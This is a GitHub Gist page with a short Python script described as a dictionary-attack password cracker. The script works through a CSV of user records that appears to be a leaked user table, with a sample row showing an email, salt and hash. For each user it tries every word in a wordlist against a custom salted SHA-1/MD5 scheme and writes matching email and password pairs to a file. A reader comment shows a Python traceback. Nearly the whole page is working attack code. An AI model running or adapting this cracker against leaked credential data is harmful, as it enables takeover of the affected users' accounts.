Last active
October 10, 2016 17:34
-
-
Save mahanmarwat/51376ab9fd9997566010 to your computer and use it in GitHub Desktop.
Dictionary attack based password cracker.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
""" | |
"42","deleted","9bd4d2724d163588e2ab6460ec111c63","deleted","deleted","1","someone@server.com","TZ851BASC9J5543U15T34Z","6eb8977fa505b44099017213d8f3714fd38a7816","0","0","deleted","7c5494c5f4203654","1385366270","1401585007","0","0",NULL | |
hash_ # 2 | |
salt # 12 | |
How it works: | |
There is a file in which there is users data. In this user data all of the | |
information is present to get a password. i.e pass hash, salt etc look to | |
the abouve line. | |
This script take one line at-a-time and using a custom method to get the | |
actual hash. see the pass_hash function. | |
Then it use dictionary attack to crack the pass. | |
""" | |
import hashlib | |
import csv | |
import threading | |
pass_found = open(r'pass_found.txt', 'w') | |
def pass_hash(salt, pass_): | |
sha = hashlib.sha1(bytes(salt + pass_, 'utf-8')).hexdigest() | |
md5 = hashlib.md5(bytes(salt + sha, 'utf-8')).hexdigest() | |
return md5 | |
def is_same(current_user=None): | |
with open(r'wordlist.txt', newline='') as file: | |
count = 0 | |
prev_count = 0 | |
print('Thread started: ' + current_user[6]) | |
for word in file: | |
if count == prev_count + 100000: | |
print(str(count) + ' checked.') | |
prev_count = count | |
if pass_hash(current_user[12], word.strip()) == current_user[2]: | |
print('Found:' + word) | |
pass_found.write(current_user[6] + ',' + | |
current_user[1] + ',' + | |
word + '\n') | |
pass_found.flush() | |
break | |
count += 1 | |
print('No pass found.') | |
print('Thread successfully completed') | |
if __name__ == '__main__': | |
with open(r'isc_users.csv', newline='') as file: | |
users = list(csv.reader(file)) | |
for current_user in users: | |
t = threading.Thread(target=is_same, args=(current_user,)) | |
t.start() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Traceback (most recent call last):
File "hashcrack.py", line 34, in
with open(r'isc_users.csv', newline='') as file:
TypeError: 'newline' is an invalid keyword argument for this function